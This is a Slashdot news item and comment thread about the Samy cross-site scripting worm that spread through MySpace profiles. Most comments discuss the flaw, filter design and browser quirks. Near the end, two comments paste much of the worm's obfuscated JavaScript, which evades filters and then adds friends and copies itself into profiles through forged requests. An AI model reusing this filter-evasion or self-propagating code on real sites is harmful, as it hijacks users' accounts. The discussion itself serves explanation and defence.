Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Cross-Site Scripting Worm Floods MySpace

Zonk posted about 9 years ago | from the why-would-you-want-to-do-anything-on-myspace dept.

Security 321

DJ_Vegas writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, 'Samy' had amassed over 1 million friends on the popular online community. According to BetaNews, the worm's code utilized XMLHTTPRequest - a JavaScript object used in AJAX Web applications and was spreading at a rate of 1,000 users every few seconds before MySpace shut down its site. Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet."

Sorry! There are no comments related to the filter you selected.

unbeleivamable (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13789905)

omg frist p0st!

Re:unbeleivamable (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13790028)

I work for frist p0st.

So I am really getting a kick out of most of these replies.

Some of you guys are very good at making it sound like you know what you are talking about.

But trust me.... You don't.

I think you just want to make yourself sound smart, when in reality you dont know what you are talking about.

This is how bad info gets passed around.

If you dont know about the topic....Dont make yourself sound like you do.

Cuz some Slashdotters belive anything they hear.

Day late, dollar short. (-1, Flamebait)

Veamon69 (904767) | about 9 years ago | (#13789910)

Awesome. Only about a week late. Heard it on a podcast monday. Goodbye slashdot, you are always late and have reached official sucktivity.

Re:Day late, dollar short. (0)

Anonymous Coward | about 9 years ago | (#13789958)

ja slashdot is teh suck. only a place for l4m3 ch00bs to hang out. m0r0ns.

Re:Day late, dollar short. (4, Insightful)

Iriel (810009) | about 9 years ago | (#13789973)

These '/. is slow and stupid' kind of posts just need to stop. But I listen to 4 different tech podcasts and hadn't heard about this yet. Think about the people who check /. for news while they're at work and most likely away from iTunes and their bookmarks, and (god-forbid) without a readily accessible aggregator. Realize this site for what it is: for the majority of it, other techies posting news they've heard about to a community they might think will care to hear it. This isn't "news as it happens updated every second" so stop treating it like it is.

Re:Day late, dollar short. (1, Insightful)

Anonymous Coward | about 9 years ago | (#13790020)

So true. Don't go away mad kids, just go away

Re:Day late, dollar short. (1)

cuzality (696718) | about 9 years ago | (#13790061)

What tech podcasts do you listen to? The only one I have really gotten into is TWiT -- any recommendations?

Re:Day late, dollar short. (1)

Iriel (810009) | about 9 years ago | (#13790189)

This is partially based on my programming prefs, but I listen to TWiT, CradCast, Pro PHP, and WebDevRadio (and I'm still looking for more good ones with more frequent updates). Though I've been meaning to check out http://www.techpodcasts.com/ [techpodcasts.com]

Re:Day late, dollar short. (2, Insightful)

gothfox (659941) | about 9 years ago | (#13790130)

Not just that. I don't know about others, but I read slashdot primarily for discussions, not raw news. There is a lot of places to flood you with news, but much less where you can actually read coherent discussions on the subject. Yes, slashdot's moderation system is far from ideal, but there actually _are_ insightful and interesting comments to read, not just "OMG LOL" babble.

Re:Day late, dollar short. (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13790203)

so much tr0ll1ng 2 do, so l1ttle tiem.

Re:Day late, dollar short. (3, Insightful)

mwvdlee (775178) | about 9 years ago | (#13790047)

If /. sucks so much, why are you still here?

Re:Day late, dollar short. (2, Funny)

the_wesman (106427) | about 9 years ago | (#13790118)

cause myspace went down

Re:Day late, dollar short. (1)

(H)elix1 (231155) | about 9 years ago | (#13790207)

If /. sucks so much, why are you still here?

For the chicks, duh...

Re:Day late, dollar short. (0)

Anonymous Coward | about 9 years ago | (#13790059)

Considering that Slashdot links to stories on other sites you're never going to see it here first. Get it?

XSS? (5, Informative)

mindstrm (20013) | about 9 years ago | (#13789915)

Is it really XSS if it's all happening at the same site? Just sayin.....

XMLHTTP has a same-site policy... the problem here is they let users render html & javascript in their own pages on the site. If slashdot allowed executable javascript in the comments, we'd have the same problem.

Re:XSS? (5, Informative)

Skye16 (685048) | about 9 years ago | (#13789933)

No, they don't let you render JavaScript on the site. If you RTFA, he split the word "java script" into two lines, hid it in a CSS tag, and IE read it anyway. MySpace has stripped out tags for at least a year and a half.

Re:XSS? (2, Informative)

Skye16 (685048) | about 9 years ago | (#13789952)

Goddammit, this is what I get for not previewing.

"he split the word 'JavaScript' into two lines", and "MySpace has stripped out JavaScript and <script> tags for at least a year and a half"

IE is too forgiving (4, Insightful)

benhocking (724439) | about 9 years ago | (#13789986)

In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things. The result of IE doing this was that some web pages look good in IE that didn't look good in other browsers - thus encouraging more people to use IE. As HTML was being used more and more by the masses, there seemed some logic to this. Of course, one of the problems with this idea is that the designers were looking at their web-pages in IE to see if their code was written correctly.

This story just goes to emphasize the importance of calling buggy HTML code what it is, and not trying to infer the intent of the HTML coder. Samy cleverly found a way to make "buggy code" that would get past MySpace's filter, but that would be rendered the way he intended by the browser with the majority market share.

Re:IE is too forgiving (1)

saforrest (184929) | about 9 years ago | (#13790110)

omitting terminating tags (e.g., &ltl\li>)

You seem to have been meaning to write '': just out of curiosity, did you deliberately omit the semicolon in the HTML entity for 'less than'? I ask because that (omitting the ;) is another example of what you're complaining about. :)

No irony was intended (4, Funny)

benhocking (724439) | about 9 years ago | (#13790218)

No, actually my pinky finger slipped and hit the "l" instead of the ";". I won't even try to explain how such a slip is possible as my other finger should have been in the way. I think I'm gonna blame quantum tunneling.

Re:IE is too forgiving (4, Insightful)

Kawahee (901497) | about 9 years ago | (#13790138)

This exploit isn't limited to IE, Safari also has this problem. And I'd probably attribute it to 'logical' coding
pseudo-c code:

if (tagname == "style" && tagtype == "text/css") {
process_stylesheet (taginfo);
} else if (tagname == "style") {
switch (tagtype) {
case "text/javascript":
process_js (taginfo);
break;
}
}


But hopefully something less obvious that doesn't scream security flaw.

Re:IE is too forgiving (2, Interesting)

smooth wombat (796938) | about 9 years ago | (#13790188)

In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things

I once made a comment in the Firefox forums about the difference between the way IE and Firefox interpret web pages. IE believes that everyone is an idiot and will pat the designer on the head and fix the errors without telling you what you did wrong. Firefox on the other hand presumes you are reasonably competent at what you are doing and will let you know when you screw up.

Re:XSS? (0)

Anonymous Coward | about 9 years ago | (#13790078)

And the winner for Most Confused use of Jargon goes to... you!

They don't let you "render" Javascript on the site because humans don't render anything. It's web browsers that do the rendering. There's no such thing as a CSS tag either.

That's Irrevellant (1)

BobPaul (710574) | about 9 years ago | (#13790097)

I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering. You can't just block the words "Javascript" and "Script" and call it good.

Re:That's Irrevellant (1)

Delirium Tremens (214596) | about 9 years ago | (#13790215)

You're right. The least they could have done was looking at the source code for IE and analyze its logic for the interpretation of script tags.
... Oh wait ...

Re:That's Irrevellant (3, Insightful)

Bogtha (906264) | about 9 years ago | (#13790250)

I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering.

That's not the right attitude. The problem lies with web browsers that accept non-standard code.

Malicious code comes in two flavours - code that is outright malicious, and code that is completely benign in browsers that conform to the W3C specifications, but is interpreted wrongly by some browsers to generate a malicious effect.

The first type is easy to filter out, because you can go to the spec and see how things are meant to be interpreted, and from that determine what should be filtered out. The other type, though, is much harder to filter out, as you also need to be aware of all the little quirks and foibles of all browsers likely to be used to access your web application - something that isn't written down anywhere most of the time.

For example, you might have written code that strips out HTML tags. That's fine, except some versions of Netscape Navigator 4.x treat entirely different Unicode characters as if they were < and >. As a web developer, you have no way of knowing about this unless you are privy to some of the most obscure browser trivia in the world, so unless you take a default deny policy and outlaw any non-ASCII characters (goodbye international visitors), you are likely to write code that is vulnerable to this attack - for Netscape 4 users.

Now multiply that problem by all browsers in use today, and all the little quirks and deviations from spec. that they have, and you'll start to get an idea of why it's not feasible for web developers to be responsible for this problem, and why the responsibility lies at the browser developers' feet.

Re:XSS? (1)

NicenessHimself (619194) | about 9 years ago | (#13789947)

The attack did include uri rewriting from profiles.myspace.com to www.myspace.com precisely to cross the sites with script. Does that count as XSS? I wonder how many /.ers are about to start seeing what kind of html they can get through the /. forum checker..

Re:XSS? (1)

SerpentMage (13390) | about 9 years ago | (#13789949)

I think the problem is that the MySpace site allows javascript to be uploaded.

http://blog.outer-court.com/archive/2005-10-13-n73 .html [outer-court.com]

From the perspective of XMLHttpRequest you cannot call a domain that is not the original HTML page. IE, Mozilla, and Safari implement same domain policy and having experimented it is not possible.

Re:XSS? (2, Insightful)

sadcox (173714) | about 9 years ago | (#13789953)

the problem here is they let users render html & javascript in their own pages on the site

No, the problem is that they let users render html & javascript badly in their own pages on the site

Re:XSS? (5, Funny)

ArsenneLupin (766289) | about 9 years ago | (#13789991)

If slashdot allowed executable javascript in the comments, we'd have the same problem.

Given its userbase, if Slashdot allowed this, it would have far far far worse problems. Like "if you ever read the wrong Slashdot comment with Internet Explorer, you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter..."

Re:XSS? (0)

Anonymous Coward | about 9 years ago | (#13790165)

wait a second... that's already happened! All the websites I visit have the goatse guy.

AJAX vuns (3, Insightful)

bloodredsun (826017) | about 9 years ago | (#13789928)

Is this the first AJAX vulnerability? Something like this would be expected in any new-ish tech that is increasing in popularity.

Re:AJAX vuns (0)

Anonymous Coward | about 9 years ago | (#13789965)

Not first AJAX exploit. the greasemonkey one a while back is similar as is another white paper on the site listed below. this site details the anatomy of an XSS worm
http://www.securiteam.com/securityreviews/6H00D0KE AY.html [securiteam.com]

Re:AJAX vuns (1)

Narcissus (310552) | about 9 years ago | (#13790071)

This isn't an AJAX vulnerability: it's XSS that uses AJAX to do its thing. The vulnerability itself is entirely a server side issue. Well, as far as I understand it, anyway...

Re:AJAX vuns (2, Informative)

erlenic (95003) | about 9 years ago | (#13790150)

As others have pointed out elsewhere, it was an IE issue. MySpace apparently does filter out the word "javascript", but this guy was able to use a problem in IE to split the word across two lines, and put it inside some CSS code. For some reason, IE sees fit to execute code like that.

Re:AJAX vuns (1)

WhoDey (629879) | about 9 years ago | (#13790093)

Someone didn't quite get the point. This has nothing to do with any vulnerability in AJAX. Cross-site scripting is a result of a web app doing a poor job of redisplaying input that it was given. This was combined with a javascript object to do some malicious stuff. While that javascript object is used in AJAX applications, this is certainly not an AJAX vulnerability.

Aww... (5, Funny)

Anonymous Coward | about 9 years ago | (#13789930)

Myspace was out for a bit? Now you've REALLY given those emo kids something to cry about.

Re:Aww... (5, Funny)

mikael (484) | about 9 years ago | (#13789995)

I bet he doesn't have over 1 million friends now.

Re:Aww... (4, Insightful)

maxwell demon (590494) | about 9 years ago | (#13790070)

Well, having over 1 million foes is also an achievement ...

First! (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13789943)

Roses are red
Violets are blue
I love you more
than my CPU!

I find this amusing... (4, Interesting)

Coocha (114826) | about 9 years ago | (#13789944)

I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

So this guy found a way to win the popularity contest. I scoff at him too, though at the same time I must laud him for his creativity. If other ./ers have insight as to what kind of malicious applications his XSS could be used for, I welcome the opportunity to learn. Also, what exactly IS XSS? Cross-site (to me) indicates that the script performs a function across multiple webpages... would this refer to all the peers in the Myspace cluster?

Re:I find this amusing... (1)

FluffyPanda (821763) | about 9 years ago | (#13790181)

The only XSS reference I can find is that he was able to access profiles from www.myspace.com while the user thought they were on profiles.myspace.com

Re:I find this amusing... (1)

giorgiofr (887762) | about 9 years ago | (#13790278)

I humbly suggest "Gratuito come birra e libero come formaggio" as the next release of your sig. It still makes no sense but it's funnier. :)

Re:I find this amusing... (3, Interesting)

lav-chan (815252) | about 9 years ago | (#13790260)

I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

Yeah, well, you're gonna expect that anywhere i guess. LiveJournal, Xanga, MySpace, BlogSpot, where-ever. I personally think MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles, it's all so interconnected).

That said, MySpace is probably one of the worst-written sites of all time. Tom seems like a swell guy (i've talked to him a few times), but he and/or his team couldn't design a site if their lives depended on it. I mean that in terms of both the HTML and the 'server-side' stuff. They're constantly doing maintenance (which hardly ever seems to fix anything); they do completely random text-filtering (like you can't say '% of', the system will strip it out); the time zones are always wrong; you have to post blogs twice sometimes in order to get the auto-formatting to work; their HTML/CSS is terrible (most of their ids and classes have illegal names); the blog's design editor is retarded because the default style sheet is set to override your custom style sheet (so i'm not sure what the point is of even having the option); and so on.

Tom says he's working on a 'CSS-friendly' version of MySpace, and it seems like that's the case because suddenly there's a bunch of unused stuff if you look at the style sheet, but i have doubts that it's actually going to be much better. ... Or if it's even going to be 'CSS-friendly'.

:shrug:

Re:I find this amusing... (1)

hazzey (679052) | about 9 years ago | (#13790291)

The same thing has been done with FaceBook. The only difference is that FaceBook still requires each user to actually accept the friendship. That doesn't stop people from running a script that invites everyone to be their friend.

Go Samy! (4, Funny)

jeek (37349) | about 9 years ago | (#13789951)

Go Samy! We're rooting for you over at EFnet #olsentwins!@

More info... (5, Informative)

TheSync (5291) | about 9 years ago | (#13789960)

Here is a recent paper on XSS viruses [bindshell.net] . Also there is an analysis [livejournal.com] of the specific MySpace worm.

Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

Re:More info... (1)

neoform (551705) | about 9 years ago | (#13789998)

it's not really shocking that MySpace lets this sort of thing through, i've always been completly un-impressed with MySpace's design.. it's always been a wonder to me why people use it.. other than the obvious "everyone else is using it" syndrome..

kinda reminds me of windows..

Re:More info... (1)

F_Scentura (250214) | about 9 years ago | (#13790103)

Are you serious? "Everyone else is using it" is *the* draw for a social networking site. Its interface is decent, and it handled the Friendster migration without the same level of outages.

Re:More info... (0)

Anonymous Coward | about 9 years ago | (#13790127)

it's not really shocking that MySpace lets this sort of thing through

Please RTFA.

Re:More info... (1, Informative)

slavemowgli (585321) | about 9 years ago | (#13790065)

Livejournal disallows Javascript (and even CSS) on their users' user info pages, but not in the actual journal entries.

Re:More info... (1)

nine-times (778537) | about 9 years ago | (#13790226)

Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

MySpace also scrubs javascript. This guy put obfuscated javascript into CSS for delivery.

Re:More info... (5, Insightful)

Jerf (17166) | about 9 years ago | (#13790258)

And it gets through because stupid programmers persist in making two mistakes:
  1. Defining "badness" instead of "goodness"
  2. Trying to "clean up" invalid code
The first one means that you try to list all of the ways that the input can be bad. The Universe is evil and it hates you. You can't list all the funky things that it can do to you. Instead, list the good things and carefully verify that the input is good.

For a simple, but very very real-world example, don't write a rule that says "If the password contains /, =, or \, reject it." Write a rule that says "Passwords may contain only letters, numbers, and underscores." In the first case, especially in the brave new world of Unicode, you'll never enumerate all the bad things that can happen.

The second mistake is that once you've decided that input is bad, do not try to clean it up. The process of cleaning it up may itself make it invalid in the case of something like HTML. Just reject it with a good error message and let the user take care of it.

If that is absolutely impossible, preferably on the lines of "you'll be fired if you don't clean it up", then at the very least, you must continue to recursively run the cleanup code until the input converges (is unchanged by the cleanup code).

It's not that it's absolutely impossible to get it right if you don't follow these rules, it's just that it's really freakin' hard. Slashdot, for instance, does seem to manage, but it took them a few iterations and ultimately, it's a low-priority site even if it does get hacked a little. Is your program that unimportant?

It's way, way easier to define legit HTML (specific tags, no attributes usually though it's easy to let a few specific ones through, even with a handful of specific values) than it is to create a function to take any arbitrary string and make "safe" HTML out of it.

Back in my day (4, Funny)

Dachannien (617929) | about 9 years ago | (#13789961)

And to think that, back in the day, people made friends by actually talking to other people.

And the phrase for self-replicating viruses was... (5, Funny)

benhocking (724439) | about 9 years ago | (#13790025)

And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.

Woefully inefficient (1)

jfengel (409917) | about 9 years ago | (#13790064)

How are you gonna make a million friends a day that way? Progress, my boy, progress!

Re:Back in my day (1)

n7022c (918189) | about 9 years ago | (#13790068)

That os SOOO low-tech, dude.

Re:Back in my day (5, Funny)

FlopEJoe (784551) | about 9 years ago | (#13790081)

Almost sad... hacking for online "friends." Like how my mother had to tie some liver to my collar to get the family dog to play with me :(

Re:Back in my day (0)

Anonymous Coward | about 9 years ago | (#13790143)

That's the same argument people used to make against email and IM.

Well, people have been saying it's a security risk (0)

g_dunn (921640) | about 9 years ago | (#13789962)

And people still leave it enabled in absurd situations like this. Hopefully MySpace and the other journal-esque sites who still have javascript enabled get a clue. While their poor security only affected themselves this time, someone with more malicious intent could easily take advantage of this for alot more destructive actions than merely viral friendmaking.

Re:Well, people have been saying it's a security r (4, Insightful)

-kertrats- (718219) | about 9 years ago | (#13790095)

They don't have javascript enabled. As far as I can tell, he just used IE's magical ability to run broken code so that the browser would be able to piece together the mess he used, but Myspace wouldnt be able to tell it was javascript.

Re:Well, people have been saying it's a security r (0)

Anonymous Coward | about 9 years ago | (#13790168)

I browse with javascript disabled and have for 5 years, it immunises me against the majority of browser exploits. You can't stop morons running embeded script but webmasters can at least make sure their site works for that 5% of us with a clue. For more complex webapps, they can provide the security concious with an alternate signed tarball or browser extension (that doesn't load/eval() script from remote servers).

Awsome (5, Funny)

AForwardMotion (586699) | about 9 years ago | (#13789968)

He'll probably get a lot of job offers from this.

Terrorism! (0)

Anonymous Coward | about 9 years ago | (#13789969)

Subverting MySpace to create 1,000 friends per second? Obviously a terrorist. Send him to Gitmo!

The Microsoft curse? (0)

alucinor (849600) | about 9 years ago | (#13789976)

So ... MS invents XMLHttpRequest ... what's logically to follow with *any* new technology MS invents? Here's for hoping that their "magic touch" will end here.

Here's the Guys Explanation of his code (5, Informative)

putko (753330) | about 9 years ago | (#13789997)

Here [namb.la] is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.

And here [namb.la] is his version of the story.

He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.

Also, his site really is "namb.la" -- he's making some sort of joke at NAMBDLA's expense, which is pretty suspect, I think.

Re:Here's the Guys Explanation of his code (0)

Anonymous Coward | about 9 years ago | (#13790144)

You're kidding right? I thought NAMBLA's mission statement was to be the butt <sic> of jokes.

Re:Here's the Guys Explanation of his code (1)

fmwap (686598) | about 9 years ago | (#13790220)

Wow, this guy is so fucked...

Not only releasing a self propagating worm, but openly confessing to copyright infringement in his explanation.

If I were Samy, I'd be on the first flight out of the country.

samy is my hero (5, Informative)

gr8n10zt (782694) | about 9 years ago | (#13790006)

The scoop from himself: http://fast.info/myspace/ [fast.info]

In the beginning (3, Insightful)

Dogsbody_D (579981) | about 9 years ago | (#13790013)

This was bound to happen sooner or later, as MySpace repeats the history of the internet. Just look at the huge number of practically unreadable webpages with different size fonts and different colours, terribly innappropriate background images. Oh, and a load of commercial interests trying to stuff things down our throats. Loads of chicks though... ;)

Re:In the beginning (2, Informative)

White Shade (57215) | about 9 years ago | (#13790116)

there ARE lots of chicks, yes, but they're all 15 years old! (claiming to be 99, and that they're "bi", and "married" to their favourite female friend from middle school, haha)

myspace is certainly addictive though ;)

Interview with "Samy" (2, Informative)

Bananatree3 (872975) | about 9 years ago | (#13790017)

There is some guy's blog that has a personal interview with Samy, the writer of this "my hero" worm here [outer-court.com] ):

Funny! (0, Flamebait)

kurt_ram (906111) | about 9 years ago | (#13790031)

Ha.. It is funny. The author *had* to bring "IE" into the discussion. Maybe it is his way to make sure that his submission is approved. Since we all know how the firefox fanboys here tend to believe that firefox is so safe, l33t and k3wl than IE.

Not Funny! (1)

boy_of_the_hash (622182) | about 9 years ago | (#13790206)

Sorry, Firefox doesn't execute script from within CSS files.

Don't you hate when you forget stuff? (4, Funny)

UserGoogol (623581) | about 9 years ago | (#13790034)

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.
FUCK! I knew I forgot to do something. I forgot to set the evil bit!

Clever MySpace users? (-1, Flamebait)

jamesgamble (917138) | about 9 years ago | (#13790067)

There are actually clever MySpace users? Wow, I'm shocked! What's next? People at Match.com without STDs?

XSS basics (4, Informative)

flanker (12275) | about 9 years ago | (#13790075)

Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.

The exploit involves placing javascript code into your posting on a website, such that when other people visit the website their browsers download your comment with the embedded javascript, which is then processed. The javascript, because it is being processed on your machine as part of the rendering of the page, can be used to exploit all sorts of vulnerabilities within browsers. When you have browsers tightly coupled with operating systems, this can open up some rather scary scenarios.

In this case, the guy just used the vulnerability to make some relatively benign changes, but he could have just as easily exploited some of the many problems with IE to be more malicious.

XMLHttpRequest (1)

matth1jd (823437) | about 9 years ago | (#13790086)

Everyone knows that XMLHttpRequest isn't secure. Where do we go from here? Is there a way to force the object to use SSL? Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

Re:XMLHttpRequest (3, Informative)

patio11 (857072) | about 9 years ago | (#13790267)

What would encryping anything have accomplished, exactly? The problem isn't that someone intercepted a legitimate transfer in the middle and modified it to be evil. The problem is that one end of the legitimate transfer was compromised, and the other end of the legitimate transfer was too trusting of the input from the compromised end, and then happily passed along that input (perfectly legitimately) to other parties who were then compromised themselves.

Re:XMLHttpRequest (1)

Slashcrap (869349) | about 9 years ago | (#13790282)

Is there a way to force the object to use SSL?

Yes, I'm sure that there is.

Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

Probably not, for most sites and applications.

But the point is that encrypting the network traffic between the client and the server would have done nothing to prevent this vulnerability. Or most others for that matter. The only thing encryption would prevent is the snooping of traffic between client & server.

Obligatory... (3, Funny)

kukickface (675936) | about 9 years ago | (#13790091)

All your friends...All your friends...All your friends are belong to us. Its the mega-happy-funtime disco hit of 2005!

Here is the source: (1, Redundant)

rpcxdr (796317) | about 9 years ago | (#13790102)

The source [namb.la] and the explanation.

The Code (2, Informative)

pturpin (801430) | about 9 years ago | (#13790105)

Here [livejournal.com] is a link to the blog entry the article mentions that contains the code of the worm. (From Evan Martin of Google)

Clever kid... (0)

Anonymous Coward | about 9 years ago | (#13790112)

...I think I definitely want to be his buddy. :)

Unpatched security holes? (2, Funny)

phlegmofdiscontent (459470) | about 9 years ago | (#13790122)

Wait, there are unpatched security holes in IE? From all I've heard lately, it's way more secure than Firefox. How could Microsoft let this happen????

Aww...so close... (0)

Anonymous Coward | about 9 years ago | (#13790154)

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

"Thankfully"? Isn't that what we want? I mean...not so much the botnet, but more the whole MySpace-being-nuked thing. :-)

Emokids cry out! (1)

Kylere (846597) | about 9 years ago | (#13790160)

In a collective mass, millions of overly pale, and under-educated emo kids could be heard to scream as their only hope of getting laid timed out.

Myspace, The AOL for 2005!

maybe... (0)

Anonymous Coward | about 9 years ago | (#13790182)

after perusing his site, i happened to notice this in the comments on one of the pages...

0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">


wonder what it is ;)

Re:maybe... (0)

Anonymous Coward | about 9 years ago | (#13790252)

erherm, i mean this
div id=my,code style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function 